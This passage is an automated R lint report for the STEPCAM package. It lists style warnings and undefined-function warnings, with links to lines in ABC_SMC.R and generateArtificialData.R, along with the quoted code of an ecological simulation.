~^~\n```\n[R/ABC_SMC.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L66) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:70:40:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2\n                                      ~^~\n```\n[R/ABC_SMC.R:78:21:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:80:46:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:80:60:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                                           ^\n```\n[R/ABC_SMC.R:86:52:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"one of the community summary statistics \n                                                   ^\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L90) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:18:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:18:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:13:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:17:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:16:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:16:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:21:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:26:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:109:16:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L109) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:7:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L121) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:121:10:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:23:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L121) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:121:29:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:30:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:170:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:174:40:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L174) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                       ^\n```\n[R/ABC_SMC.R:174:53:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L174) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                                   ~^~\n```\n[R/ABC_SMC.R:175:40:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L175) *style:* **Put spaces around all infix operators.**\n```r\n​                              row.names=c(1:taxa))\n                                      ~^~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:180:20:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:180:50:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                                                 ^\n```\n[R/ABC_SMC.R:181:64:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                m = res[[1]], nb.sp = res[[2]]) \n                                                               ^\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L182) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:184:29:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L184) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FRic <- FD_output$FRic \n                            ^\n```\n[R/ABC_SMC.R:186:29:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FEve <- FD_output$FEve \n                            ^\n```\n[R/ABC_SMC.R:188:29:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L188) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FDiv <- FD_output$FDiv \n                            ^\n```\n[R/ABC_SMC.R:197:69:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # calculate distance of trait mean between simulated community \n                                                                    ^\n```\n[R/ABC_SMC.R:201:72:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L201) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean \n                                                                       ^\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L205) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:208:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:14:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:18:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:17:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:24:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <- 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:24:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <-\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:13:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:9:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:27:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:13:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L226) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:226:14:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:34:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:255:54:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:258:64:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \n                                                               ^\n```\n[R/ABC_SMC.R:259:33:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:56:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L259) *style:* **Put spaces around all infix operators.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                                      ~^~\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:20:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:275:61:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:279:40:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L279) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"Can't stop at iteration 1 - \n                                       ^\n```\n[R/ABC_SMC.R:280:57:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​           please set stop_at_iteration to 2 if you only \n                                                        ^\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L5) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:12:21:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:12:47:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:12:49:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:12:64:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:50:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:13:58:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:14:37:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:14:54:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never 